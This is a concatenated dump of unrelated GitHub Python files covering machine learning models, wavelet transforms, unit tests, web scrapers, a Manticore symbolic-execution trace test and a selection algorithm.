if(np.abs(val) < epsilon):\n break\n #return {'cost': arrcost, 'theta': theta }\n\n pred = np.dot(testx, theta)\n error = np.true_divide(len(pred[np.round(res) == testy]), len(testy)) * 100\n #return {'cost': arrcost, 'theta': theta}\n return error","repo_name":"sumukh210991/Living_Indicator","sub_path":"Code/classGradientDescent.py","file_name":"classGradientDescent.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39008100275","text":"import unittest\n\nimport numpy as np\nfrom numpy.testing import assert_array_equal\n\nimport scot.xvschema\n\n\nclass TestBuiltin(unittest.TestCase):\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def test_singletrial(self):\n n_trials = 10\n xv = scot.xvschema.singletrial(n_trials)\n for n, (train, test) in enumerate(xv):\n self.assertEqual(len(train), 1)\n self.assertEqual(len(test), n_trials - 1)\n\n for t in train:\n self.assertTrue(t not in test)\n\n self.assertEqual(train[0], n)\n\n def test_multitrial(self):\n n_trials = 10\n xv = scot.xvschema.multitrial(n_trials)\n for n, (train, test) in enumerate(xv):\n self.assertEqual(len(test), 1)\n self.assertEqual(len(train), n_trials - 1)\n\n for t in train:\n self.assertTrue(t not in test)\n\n self.assertEqual(test[0], n)\n\n def test_splitset(self):\n n_trials = 10\n xv = scot.xvschema.splitset(n_trials)\n for n, (train, test) in enumerate(xv):\n self.assertEqual(len(test), n_trials // 2)\n self.assertEqual(len(train), n_trials // 2)\n\n for t in train:\n self.assertTrue(t not in test)\n\n def test_nfold(self):\n n_trials = 50\n n_blocks = 5\n xv = scot.xvschema.make_nfold(n_blocks)(n_trials)\n for n, (train, test) in enumerate(xv):\n self.assertEqual(len(test), n_trials // n_blocks)\n self.assertEqual(len(train), n_trials - n_trials // n_blocks)\n\n for t in train:\n self.assertTrue(t not in test)\n self.assertEqual(n + 1, n_blocks)\n\n\nclass TestSklearn(unittest.TestCase):\n def setUp(self):\n try:\n import sklearn\n except ImportError:\n self.skipTest(\"could not import scikit-learn\")\n\n def tearDown(self):\n pass\n\n def test_leave1out(self):\n from sklearn.model_selection import LeaveOneOut\n n_trials = 10\n xv1 = scot.xvschema.multitrial(n_trials)\n xv2 = LeaveOneOut().split(np.arange(n_trials))\n self._comparexv(xv1, xv2)\n\n def test_kfold(self):\n from sklearn.model_selection import KFold\n n_trials = 15\n n_blocks = 5\n xv1 = scot.xvschema.make_nfold(n_blocks)(n_trials)\n xv2 = KFold(n_splits=n_blocks, shuffle=False).split(np.arange(n_trials))\n self._comparexv(xv1, xv2)\n\n def test_application(self):\n from scot.var import VAR\n from sklearn.model_selection import LeaveOneOut, KFold\n np.random.seed(42)\n x = np.random.randn(10, 3, 15)\n\n var = VAR(3, xvschema=lambda n, _: LeaveOneOut().split(range(n))).optimize_delta_bisection(x)\n self.assertGreater(var.delta, 0)\n var = VAR(3, xvschema=lambda n, _: KFold(5).split(range(n))).optimize_delta_bisection(x)\n self.assertGreater(var.delta, 0)\n\n def _comparexv(self, xv1, xv2):\n for (a, b), (c, d) in zip(xv1, xv2):\n assert_array_equal(a, c)\n assert_array_equal(b, d)\n","repo_name":"scot-dev/scot","sub_path":"scot/tests/test_xvschema.py","file_name":"test_xvschema.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"54"} +{"seq_id":"32231549181","text":"import cv2\nimport math\nimport pywt\nimport numpy as np\nimport models.DWT2\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\n\n# load Lenna image\nimg_in = cv2.imread(\"../input/Lenna_Orig.png\")\nimg_grey = cv2.cvtColor(img_in, cv2.COLOR_RGB2GRAY)\nw, h = img_grey.shape\n\n# load DWT model\nmodel = keras.Sequential()\nmodel.add(keras.Input(shape=(512, 512, 1)))\nmodel.add(models.DWT2.DWT())\nmodel.summary()\n\n# convert input image to tensor in order to pass to model\nimg_grey = tf.expand_dims(img_grey, axis=0)\nimg_grey = tf.expand_dims(img_grey, axis=-1)\ncoeffs = model.predict(img_grey, steps=1)\n\n# convert model output to images\n# cA = tf.image.convert_image_dtype(coeffs[0, ..., 0], dtype=tf.float32)\n# cH = tf.image.convert_image_dtype(coeffs[0, ..., 1], dtype=tf.float32)\n# cV = tf.image.convert_image_dtype(coeffs[0, ..., 2], dtype=tf.float32)\n# cD = tf.image.convert_image_dtype(coeffs[0, ..., 3], dtype=tf.float32)\n#\n# with tf.Session() as sess:\n# cA = sess.run(cA)\n# cH = sess.run(cH)\n# cV = sess.run(cV)\n# cD = sess.run(cD)\n\n\n# 3rd party library to compare resaoults\n# coeffs = pywt.dwt2(img_grey, 'db2')\n# cA, (cH, cV, cD) = coeffs\n\n\n# convert coeffs into tensor for IDWT model\n# cA = tf.constant(cA)\n# cA = tf.expand_dims(cA, axis=-1)\n# cH = tf.constant(cH)\n# cH = tf.expand_dims(cH, axis=-1)\n# cV = tf.constant(cV)\n# cV = tf.expand_dims(cV, axis=-1)\n# cD = tf.constant(cD)\n# cD = tf.expand_dims(cD, axis=-1)\n# x = tf.concat([cA, cH, cV, cD], axis=-1)\n# x = tf.expand_dims(x, axis=0)\n\n\n\n# symetric border padding colums for convolution\nx = tf.pad(coeffs, [[0, 0], [0, 0], [3, 3], [0, 0]], \"SYMMETRIC\")\nx = tf.cast(x, tf.float32)\n\n# calc db2 coefs\ndb2_h0 = (1+math.sqrt(3))/(4*math.sqrt(2))\ndb2_h1 = (3+math.sqrt(3))/(4*math.sqrt(2))\ndb2_h2 = (3-math.sqrt(3))/(4*math.sqrt(2))\ndb2_h3 = (1-math.sqrt(3))/(4*math.sqrt(2))\n\n# Reconstruction LPF and HPF\ndb2_lpfR = [db2_h3, db2_h2, db2_h1, db2_h0]\ndb2_hpfR = [-db2_h0, db2_h1, -db2_h2, db2_h3]\nprint(db2_lpfR)\nprint(db2_hpfR)\n# convert to matrix for conv2d\ndb2_lpf = tf.constant(db2_lpfR)\ndb2_lpf = tf.reshape(db2_lpf, (1, 4, 1, 1))\n# db2_lpf = tf.repeat(db2_lpf, 4, axis=-1)\n\ndb2_hpf = tf.constant(db2_hpfR)\ndb2_hpf = tf.reshape(db2_hpf, (1, 4, 1, 1))\n# db2_hpf = tf.repeat(db2_hpf, 4, axis=-1)\n\n# upsampling -> padding zeros between all elements\nLL = tf.expand_dims(x[:,:,:,0], axis=-1)\nLH = tf.expand_dims(x[:,:,:,1], axis=-1)\nHL = tf.expand_dims(x[:,:,:,2], axis=-1)\nHH = tf.expand_dims(x[:,:,:,3], axis=-1)\n\ndef upsampler(x):\n zero_tensor = tf.zeros(shape=x.shape, dtype=tf.float32)\n stack_rows = tf.stack([x, zero_tensor], axis=3)\n stack_rows = tf.reshape(stack_rows, shape=[x.shape[0], x.shape[1], x.shape[2]*2, x.shape[3]])\n stack_rows = tf.transpose(stack_rows, perm=[0, 2, 1, 3])\n zero_tensor_1 = tf.zeros(shape=stack_rows.shape, dtype=tf.float32)\n\n stack_rows_cols = tf.stack([stack_rows, zero_tensor_1], axis=3)\n us_padded = tf.reshape(stack_rows_cols, shape=[x.shape[0], x.shape[1]*2, x.shape[2]*2, x.shape[3]])\n\n us_padded = tf.transpose(us_padded, perm=[0, 2, 1, 3])\n return us_padded\n\n\nLL_us_pad = upsampler(LL)\nLH_us_pad = upsampler(LH)\nHL_us_pad = upsampler(HL)\nHH_us_pad = upsampler(HH)\n\n\nzero_tensor = tf.zeros(shape=x.shape, dtype=tf.float32)\nc = tf.stack([x, zero_tensor], axis=4)\na_us = tf.reshape(c, shape=[x.shape[0], x.shape[1], x.shape[2]*2, x.shape[3]])\n\nzero_tensor_n = tf.zeros(shape=a_us.shape, dtype=tf.float32)\n\nd = tf.stack([a_us, zero_tensor_n], axis=3)\na_us_us = tf.reshape(d, shape=[x.shape[0], x.shape[1]*2, x.shape[2]*2, x.shape[3]])\n\n\nLL_us_pad = tf.expand_dims(a_us_us[:,:,:,0], axis=-1)\nLH_us_pad = tf.expand_dims(a_us_us[:,:,:,1], axis=-1)\nHL_us_pad = tf.expand_dims(a_us_us[:,:,:,2], axis=-1)\nHH_us_pad = tf.expand_dims(a_us_us[:,:,:,3], axis=-1)\n\npadd_type = 'VALID'\nLL_conv_lpf = tf.nn.conv2d(LL_us_pad, db2_lpf, padding=padd_type, strides=[1, 1, 1, 1],)\n\nLL_conv_lpf_tr = tf.transpose(LL_conv_lpf, perm=[0, 2, 1, 3])\nLL_conv_lpf_lpf = tf.nn.conv2d(LL_conv_lpf_tr, db2_lpf, padding=padd_type, strides=[1, 1, 1, 1],)\nLL_conv_lpf_lpf_tr = tf.transpose(LL_conv_lpf_lpf, perm=[0, 2, 1, 3])\n\nLH_conv_lpf = tf.nn.conv2d(LH_us_pad, db2_lpf, padding=padd_type, strides=[1, 1, 1, 1],)\nLH_conv_lpf_tr = tf.transpose(LH_conv_lpf, perm=[0, 2, 1, 3])\nLH_conv_lpf_hpf = tf.nn.conv2d(LH_conv_lpf_tr, db2_hpf, padding=padd_type, strides=[1, 1, 1, 1],)\nLH_conv_lpf_hpf_tr = tf.transpose(LH_conv_lpf_hpf, perm=[0, 2, 1, 3])\n\nHL_conv_hpf = tf.nn.conv2d(HL_us_pad, db2_hpf, padding=padd_type, strides=[1, 1, 1, 1],)\nHL_conv_hpf_tr = tf.transpose(HL_conv_hpf, perm=[0, 2, 1, 3])\nHL_conv_hpf_lpf = tf.nn.conv2d(HL_conv_hpf_tr, db2_lpf, padding=padd_type, strides=[1, 1, 1, 1],)\nHL_conv_hpf_lpf_tr = tf.transpose(HL_conv_hpf_lpf, perm=[0, 2, 1, 3])\n\nHH_conv_hpf = tf.nn.conv2d(HH_us_pad, db2_hpf, padding=padd_type, strides=[1, 1, 1, 1],)\nHH_conv_hpf_tr = tf.transpose(HH_conv_hpf, perm=[0, 2, 1, 3])\nHH_conv_hpf_hpf = tf.nn.conv2d(HH_conv_hpf_tr, db2_hpf, padding=padd_type, strides=[1, 1, 1, 1],)\nHH_conv_hpf_hpf_tr = tf.transpose(HH_conv_hpf_hpf, perm=[0, 2, 1, 3])\n\n\nLL_LH = tf.math.add(LL_conv_lpf_lpf_tr, LH_conv_lpf_hpf_tr)\nHL_HH = tf.math.add(HL_conv_hpf_lpf_tr, HH_conv_hpf_hpf_tr)\n\nres = tf.math.add(LL_LH,HL_HH)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#\n# with tf.Session() as sess:\n# # cA_Temp = sess.run(cA_Temp)\n# a_us_Temp = sess.run(conv_rows_lpf)\n# # a_us_TEMP = sess.run(a_us_assign)\n# pass\n# #\n\n# conv_rows_hpf = tf.nn.conv2d(\n# x, db2_hpf, padding='VALID', strides=[1, 1, 1, 1],\n# )\n#\n# conv_rows_lpf_ds = conv_rows_lpf[:, :, 1:w:2, :]\n# conv_rows_hpf_ds = conv_rows_hpf[:, :, 1:w:2, :]\n#\n#\n# conv_rows_lpf_ds_padd = tf.pad(conv_rows_lpf_ds, [[0, 0], [3, 3], [0, 0], [0, 0]], \"SYMMETRIC\")\n# conv_rows_hpf_ds_padd = tf.pad(conv_rows_lpf_ds, [[0, 0], [3, 3], [0, 0], [0, 0]], \"SYMMETRIC\")\n#\n# conv_rows_lpf_ds_padd = tf.transpose(conv_rows_lpf_ds_padd)\n# conv_rows_hpf_ds_padd = tf.transpose(conv_rows_hpf_ds_padd)\n#\n# conv_rows_lps_padd_conv_cols_lpf = tf.nn.conv2d(\n# conv_rows_lpf_ds_padd, db2_lpf, padding='VALID', strides=[1, 1, 1, 1],\n# )\n# conv_rows_lps_padd_conv_cols_hpf = tf.nn.conv2d(\n# conv_rows_lpf_ds_padd, db2_hpf, padding='VALID', strides=[1, 1, 1, 1],\n# )\n# conv_rows_hps_padd_conv_cols_lpf = tf.nn.conv2d(\n# conv_rows_hpf_ds_padd, db2_lpf, padding='VALID', strides=[1, 1, 1, 1],\n# )\n# conv_rows_hps_padd_conv_cols_hpf = tf.nn.conv2d(\n# conv_rows_hpf_ds_padd, db2_hpf, padding='VALID', strides=[1, 1, 1, 1],\n# )\n#\n# conv_rows_lps_padd_conv_cols_lpf = tf.transpose(conv_rows_lps_padd_conv_cols_lpf)\n# conv_rows_lps_padd_conv_cols_hpf = tf.transpose(conv_rows_lps_padd_conv_cols_hpf)\n# conv_rows_hps_padd_conv_cols_lpf = tf.transpose(conv_rows_hps_padd_conv_cols_lpf)\n# conv_rows_hps_padd_conv_cols_hpf = tf.transpose(conv_rows_hps_padd_conv_cols_hpf)\n#\n# conv_rows_lps_padd_conv_cols_lpf_ds = conv_rows_lps_padd_conv_cols_lpf[:, 1:h:2, :, :]\n# conv_rows_lps_padd_conv_cols_hpf_ds = conv_rows_lps_padd_conv_cols_hpf[:, 1:h:2, :, :]\n# conv_rows_hps_padd_conv_cols_lpf_ds = conv_rows_hps_padd_conv_cols_lpf[:, 1:h:2, :, :]\n# conv_rows_hps_padd_conv_cols_hpf_ds = conv_rows_hps_padd_conv_cols_hpf[:, 1:h:2, :, :]\n#\n# image_tensor_conv_rows_lpf = tf.image.convert_image_dtype(conv_rows_lpf[0, ..., 0], dtype=tf.float32)\n# image_tensor_conv_rows_hpf = tf.image.convert_image_dtype(conv_rows_hpf[0, ..., 0], dtype=tf.float32)\n#\n# image_tensor_conv_rows_lpf_ds = tf.image.convert_image_dtype(conv_rows_lpf_ds[0, ..., 0], dtype=tf.float32)\n# image_tensor_conv_rows_hpf_ds = tf.image.convert_image_dtype(conv_rows_hpf_ds[0, ..., 0], dtype=tf.float32)\n#\n# img_conv_rows_lps_padd_conv_cols_lpf_ds = tf.image.convert_image_dtype(conv_rows_lps_padd_conv_cols_lpf_ds[0, ..., 0], dtype=tf.float32)\n# img_conv_rows_lps_padd_conv_cols_hpf_ds = tf.image.convert_image_dtype(conv_rows_lps_padd_conv_cols_hpf_ds[0, ..., 0], dtype=tf.float32)\n# img_conv_rows_hps_padd_conv_cols_lpf_ds = tf.image.convert_image_dtype(conv_rows_hps_padd_conv_cols_lpf_ds[0, ..., 0], dtype=tf.float32)\n# img_conv_rows_hps_padd_conv_cols_hpf_ds = tf.image.convert_image_dtype(conv_rows_hps_padd_conv_cols_hpf_ds[0, ..., 0], dtype=tf.float32)\n#\n#\n# orig_iamge_padded = tf.image.convert_image_dtype(x[0, ..., 0], dtype=tf.uint8)\n# with tf.Session() as sess:\n# # print(sess.run(db2_lpf))\n# # print(sess.run(db2_hpf))\n# image_conv_rows_lpf = sess.run(image_tensor_conv_rows_lpf)\n# image_conv_rows_hpf = sess.run(image_tensor_conv_rows_hpf)\n# image_conv_rows_lpf_ds = sess.run(image_tensor_conv_rows_lpf_ds)\n# image_conv_rows_hpf_ds = sess.run(image_tensor_conv_rows_hpf_ds)\n#\n# LL = sess.run(img_conv_rows_lps_padd_conv_cols_lpf_ds)\n# LH = sess.run(img_conv_rows_lps_padd_conv_cols_hpf_ds)\n# HL = sess.run(img_conv_rows_hps_padd_conv_cols_lpf_ds)\n# HH = sess.run(img_conv_rows_hps_padd_conv_cols_hpf_ds)\n# orig_img_pad = sess.run(orig_iamge_padded)\n# pass\n\n# cv2.imshow(\"tf\", image)\n# cv2.waitKey(0)\n# LL = np.clip(LL,0,255)\n# LL = np.ceil(LL)\n# LL = LL.astype(\"uint8\")\n# with open(r\"D:\\TEMP\\LL_python.raw\", \"wb\") as outfile:\n# outfile.write(LL) # Write it\n","repo_name":"EziGo96/Wavelet_Face_Anti_spoofing","sub_path":"tensorflow-wavelets-main/Development/Scripts/idwt2d_db2.py","file_name":"idwt2d_db2.py","file_ext":"py","file_size_in_byte":9162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"23004125568","text":"import torch.nn as nn\nimport torch.nn.functional as F\nimport torch\n\n\nclass ResidualConv(nn.Module):\n def __init__(self, input_dim, output_dim, stride, padding):\n super(ResidualConv, self).__init__()\n\n self.conv_block = nn.Sequential(\n nn.BatchNorm2d(input_dim),\n nn.ReLU(),\n nn.Conv2d(\n input_dim, output_dim, kernel_size=3, stride=stride, padding=padding\n ),\n nn.BatchNorm2d(output_dim),\n nn.ReLU(),\n nn.Conv2d(output_dim, output_dim, kernel_size=3, padding=1),\n )\n self.conv_skip = nn.Sequential(\n nn.Conv2d(input_dim, output_dim, kernel_size=3, stride=stride, padding=1),\n nn.BatchNorm2d(output_dim),\n )\n\n def forward(self, x):\n\n return self.conv_block(x) + self.conv_skip(x)\n\n\nclass Upsample(nn.Module):\n def __init__(self, input_dim, output_dim, kernel, stride):\n super(Upsample, self).__init__()\n\n self.upsample = nn.ConvTranspose2d(\n input_dim, output_dim, kernel_size=kernel, stride=stride\n )\n\n def forward(self, x):\n return self.upsample(x)\n\n\n\nclass clsResUnet(nn.Module):\n def __init__(self, channel, n_classes=3, filters=[64, 128, 256, 512]):\n super(clsResUnet, self).__init__()\n self.n_classes = n_classes\n\n self.input_layer = nn.Sequential(\n nn.Conv2d(channel, filters[0], kernel_size=3, padding=1),\n nn.BatchNorm2d(filters[0]),\n nn.ReLU(),\n nn.Conv2d(filters[0], filters[0], kernel_size=3, padding=1),\n )\n self.input_skip = nn.Sequential(\n nn.Conv2d(channel, filters[0], kernel_size=3, padding=1)\n )\n\n self.residual_conv_1 = ResidualConv(filters[0], filters[1], 2, 1)\n self.residual_conv_2 = ResidualConv(filters[1], filters[2], 2, 1)\n\n self.bridge = ResidualConv(filters[2], filters[3], 2, 1)\n\n self.upsample_1 = Upsample(filters[3], filters[3], 2, 2)\n self.up_residual_conv1 = ResidualConv(filters[3] + filters[2], filters[2], 1, 1)\n\n self.upsample_2 = Upsample(filters[2], filters[2], 2, 2)\n self.up_residual_conv2 = ResidualConv(filters[2] + filters[1], filters[1], 1, 1)\n\n self.upsample_3 = Upsample(filters[1], filters[1], 2, 2)\n self.up_residual_conv3 = ResidualConv(filters[1] + filters[0], filters[0], 1, 1)\n\n self.output_layer = nn.Sequential(\n nn.Conv2d(filters[0], self.n_classes, 1, 1),\n nn.Sigmoid(),\n )\n\n self.linear = nn.Linear(512, self.n_classes)\n\n def forward(self, x):\n # Encode\n x1 = self.input_layer(x) + self.input_skip(x)\n x2 = self.residual_conv_1(x1)\n x3 = self.residual_conv_2(x2)\n # Bridge\n x4 = self.bridge(x3)\n #print(\"meddle shape: \", x4.shape)\n out_cls = F.avg_pool2d(x4, 64)\n #print(\"avg shape: \", out_cls.shape)\n out_cls = out_cls.view(out_cls.size(0), -1)\n #print(\"view shape: \", out_cls.shape)\n out_cls = self.linear(out_cls)\n #print(\"out_cls shape: \", out_cls.shape)\n\n # Decode\n x4 = self.upsample_1(x4)\n x5 = torch.cat([x4, x3], dim=1)\n\n x6 = self.up_residual_conv1(x5)\n\n x6 = self.upsample_2(x6)\n x7 = torch.cat([x6, x2], dim=1)\n\n x8 = self.up_residual_conv2(x7)\n\n x8 = self.upsample_3(x8)\n x9 = torch.cat([x8, x1], dim=1)\n\n x10 = self.up_residual_conv3(x9)\n\n output = self.output_layer(x10)\n if self.training:\n return output, out_cls\n else:\n for i in range(self.n_classes):\n output[:,i] = output[:,i] * out_cls[i]\n return output\n\n\nif __name__ == '__main__':\n import os\n os.environ['CUDA_VISIBLE_DEVICES'] = '1'\n\n\n\n model = clsResUnet(3, 3).cuda()\n print(model)\n\n x = torch.randn((1, 3, 512, 512)).cuda()\n\n pred = model(x)\n\n print(pred.shape)","repo_name":"linzhenyuyuchen/semantic-segmentation","sub_path":"modeling/clsResUnet.py","file_name":"clsResUnet.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"73942017122","text":"# -*- coding: utf-8 -*-\n\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys # 文字を入力する時に使う\nfrom selenium.webdriver.chrome.options import Options\nfrom time import sleep\nimport json\nfrom datetime import datetime\n\ndef soclParseJson(sound_list):\n data_list = [] \n for sound in sound_list:\n sound_in = {} # サウンドの情報を辞書形式でまとめる\n \n # サウンドの投稿者の名前を入手\n name = sound.find(\"span\",class_=\"soundTitle__usernameText\").text\n # print(str(name))\n sound_in[\"name\"] = name.strip() # strip()は両端の空白と改行をなくしてくれる\n \n # サウンドのタイトルを入手\n title = sound.find(\"a\",class_=\"soundTitle__title\").find(\"span\").text\n #print(str(title).encode('utf-8'))\n # 指定したタグ&クラス内のtitleを出す\n sound_in[\"title\"] = title.strip()\n \n # サウンドのリンクを入手\n link = sound.find(\"a\",class_=\"soundTitle__title\").get(\"href\")\n # 指定したタグ&クラス内のhrefを出す\n #print(str(link))\n sound_in[\"link\"] = \"https://soundcloud.com\" + link\n \n # 投稿日時\n uploadTime = sound.find(\"time\").get(\"datetime\")\n #print(str(uploadTime))\n sound_in[\"uploadTime\"] = uploadTime.strip()\n \n # 投稿経過時間\n postedTime = sound.find(\"time\").get(\"title\")\n #print(str(postedTime))\n sound_in[\"postedTime\"] = postedTime.strip()\n \n # 再生回数\n if sound.find(\"li\", class_=\"sc-ministats-item\"):\n plays = sound.find(\"li\", class_=\"sc-ministats-item\").get(\"title\")\n\n sound_in[\"plays\"] = plays\n else:\n sound_in[\"plays\"] = u\"0 plays\"\n\n # サウンドのイメージ\n imagetag = sound.find(\"span\",class_=\"image__full\").get(\"style\")\n image = imagetag[imagetag.find(\"url(\")+4:imagetag.find(\");\")]\n sound_in[\"image\"] = image\n \n # data_list =sound_in # data_listに1ページ分の内容をまとめる\n data_list.append(sound_in)\n # f.write(str(sound_in))\n\n return data_list\n","repo_name":"ma2tani/socl-tracks-api","sub_path":"soclParseJson.py","file_name":"soclParseJson.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"526689884","text":"import os\nimport pandas as pd\n\nfrom modeling.supervised.data_cleaning import Text\nfrom modeling.supervised.model import NeuralNetwork\n\npath = '/Users/nkuzak003/Documents/data/personal/sentiment labelled sentences/'\n\ndf_list = []\nfor x in os.listdir(path):\n if x[x.rfind('_')+1: x.find('.')] == 'labelled':\n df = pd.read_csv(os.path.join(path, x), names=['sentence', 'label'], sep='\\t')\n df['source'] = x[:x.find('_')] \n df_list.append(df)\ndf = pd.concat(df_list)\n\nds = Text(df=df, feature_col='sentence', label_col='label')\nsave_path = '/Users/nkuzak003/Documents/personal/notebooks/test_data'\n\nds.train_fasttext(save_path)\n\nmodel = NeuralNetwork(ds)\nlayers = [30, 10]\nmodel.embedding_to_sequential(layers)\nmodel.train( validation_split=.2, epochs=10)\nmodel.evaluate()","repo_name":"nicokuzak/algos","sub_path":"modeling/supervised/text_sample.py","file_name":"text_sample.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29227822418","text":"#!/usr/bin/env python\n# _*_ coding: UTF-8 _*_\n\"\"\"=================================================\n@Project -> File : FDS -> demo.py\n@IDE : PyCharm\n@Author : Aimee\n@Date : 2020/5/18 14:44\n@Desc :\n=================================================\"\"\"\nimport requests\nfrom lxml import etree\n\n\nclass Spider(object):\n def start_request(self):\n for i in range(1, 2):\n response = requests.get(\"https://ibaotu.com/shipin/\")\n html = etree.HTML(response.content.decode(\"utf-8\"))\n self.xpath_data(html)\n\n def xpath_data(self, html):\n src_list = html.xpath('//div[@class=\"video-play\"]/video/@src')\n tit_list = html.xpath('//span[@class=\"video-title\"]/text()')\n for src, tit in zip(src_list[:2], tit_list[:2]):\n url = \"http:\" + src\n file_name = tit + \".mp4\"\n response = requests.get(url)\n print(\"正在抓取文件:\" + file_name)\n\n # 保存数据\n with open(\"video/{}\".format(file_name), \"wb\") as f:\n f.write(response.content)\n\n\nif __name__ == '__main__':\n er = Spider()\n er.start_request()\n","repo_name":"Aimee888/python-20200413","sub_path":"20200518/包图网/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11231913536","text":"import tensorflow as tf\r\n\r\nimport input_data\r\n\r\nlearning_rate = 0.01\r\ntraining_epochs = 25\r\nbatch_size = 100\r\ndisplay_step = 1\r\n\r\nmnist = input_data.read_data_sets(\"./MNIST_DATA\", one_hot=True)\r\n\r\n# tensorflow graph input\r\nX = tf.placeholder('float', [None, 784]) # mnist data image of shape 28 * 28 = 784\r\nY = tf.placeholder('float', [None, 10]) # 0-9 digits recognition = > 10 classes\r\n\r\n# set model weights\r\nW = tf.Variable(tf.zeros([784, 10]))\r\nb = tf.Variable(tf.zeros([10]))\r\n\r\n# Our hypothesis\r\nactivation = tf.add(tf.matmul(X, W),b) # Softmax\r\n\r\n# Cost function: cross entropy\r\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=activation, labels=Y))\r\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost) # Gradient Descen\r\n\r\n# Before starting, initialize the variables. We will `run` this first.\r\ninit = tf.global_variables_initializer()\r\n\r\n# Launch the graph,\r\nwith tf.Session() as sess:\r\n sess.run(init)\r\n\r\n # Training cycle\r\n for epoch in range(training_epochs):\r\n avg_cost = 0.\r\n total_batch = int(mnist.train.num_examples/batch_size)\r\n\r\n # Fit the line.\r\n for step in range(total_batch):\r\n batch_xs, batch_ys = mnist.train.next_batch(batch_size)\r\n\r\n # Fit training using batch data\r\n\r\n sess.run(optimizer, feed_dict={X: batch_xs, Y: batch_ys})\r\n\r\n # Compute average loss\r\n avg_cost += sess.run(cost, feed_dict={X: batch_xs, Y: batch_ys})/total_batch\r\n # Display logs per epoch step\r\n if epoch % display_step == 0:\r\n print (\"Epoch:\", '%04d' %(epoch+1), \"cost=\", \"{:.9f}\".format(avg_cost))\r\n\r\n print (\"Optimization Finished!\")\r\n\r\n # Test model\r\n correct_prediction = tf.equal(tf.argmax(activation, 1), tf.argmax(Y, 1))\r\n # Calculate accuracy\r\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\r\n print (\"Accuracy:\", accuracy.eval({X: mnist.test.images, Y: mnist.test.labels}))","repo_name":"leejaymin/TensorFlowLecture","sub_path":"4.MNIST/SoftmaxClassificationMNIST.py","file_name":"SoftmaxClassificationMNIST.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"54"} +{"seq_id":"41903382180","text":"def test():\n from manticore.native import Manticore\n\n if __name__ == \"__main__\":\n import sys\n\n prog = sys.argv[1]\n params = sys.argv[2:]\n else:\n prog = \"test_exploit_generation_example/bof\"\n params = [\"AAAAAAAAAAAAAAAAAAAAAAA\"]\n\n m = Manticore(prog, params)\n m.verbosity(2)\n # 'trace' will contain the executed instructions\n m.context[\"trace\"] = []\n\n # None: The hook will be applied to all the instructions\n @m.hook(None)\n def record_trace(state):\n pc = state.cpu.PC\n ins = state.cpu.instruction\n # Store the instruction\n with m.locked_context() as c:\n c[\"trace\"] += [pc]\n\n # We manipulate directly capstone instruction\n c[\"last_ins\"] = \"%s %s\" % (ins.mnemonic, ins.op_str)\n # print(state.cpu)\n # print(state.mem)\n\n m.run()\n\n # Print number of instructions recorded and the last executed\n print(\"%d instructions are recorded\" % len(m.context[\"trace\"]))\n print(\"Last instruction executed:\")\n print(\"0x%x: %s\" % (m.context[\"trace\"][-1], m.context[\"last_ins\"]))\n\n assert m.context[\"last_ins\"] == \"call eax\"\n\n\nif __name__ == \"__main__\":\n test()\n","repo_name":"stjordanis/manticore-examples","sub_path":"test_exploit_generation_example/test_record.py","file_name":"test_record.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"25531794831","text":"# CS325 - Group Assignment #1\n# Author: Francisco Bolanos, Jaehyung You\n# Date : Tue, October 10, 2017\n# Filename : select.py\n\nimport os\nimport struct\n\ndef get_m():\n with open('input.txt','rt') as f1:\n for line in f1:\n x = line.split(',')[0]\n return x\n\ndef get_n():\n with open('input.txt','rt') as f2:\n for line in f2:\n y = line.split(',')[1]\n return y\n\ndef get_k():\n with open('input.txt','rt') as f3:\n for line in f3:\n z = line.split(',')[2]\n return z\n\t\ndef write_to_output(number):\n\twith open('output.txt', 'w') as f4:\n\t\tf4.write(str(number))\n\n#it will give you an element to the specific index.\ndef getnum(index, filename):\n f = open(filename,'r')\n f.seek(4*index)\n return struct.unpack('>I',f.read(4))[0]\n\t\n#binary search. it will return the index of the element.\ndef binary_search(sizeArray, filename, number):\n\twhile sizeArray[1] > sizeArray[0]:\n\t\tmiddle = (sizeArray[1] + sizeArray[0])/2\n\t\tnumberAtIndex = getnum(middle, filename)\n\t\t\n\t\tif numberAtIndex == number:\n\t\t\treturn middle\n\t\tif numberAtIndex == getnum(sizeArray[1], filename):\n\t\t\treturn sizeArray[1]\n\t\t\n\t\tif (sizeArray[1] - sizeArray[0]) == 1:\n\t\t\tif number > getnum(sizeArray[1], filename):\n\t\t\t\treturn sizeArray[1]\n\t\t\tif numberAtIndex < number:\n\t\t\t\treturn sizeArray[0]\n\t\t\treturn sizeArray[0]-1\n\t\t\n\t\telif numberAtIndex < number:\n\t\t\tsizeArray[0] = middle\n\t\telif numberAtIndex > number:\n\t\t\tsizeArray[1] = middle\n\t\n\tif getnum(sizeArray[0], filename) <= number :\n\t\treturn sizeArray[0]\n\telse:\n\t\treturn -1\n\t\t\t\n#find the longest array so that we can find the middle number.\ndef LongestArray(sizes,m):\n\tlongArray = 0\n\tfor i in 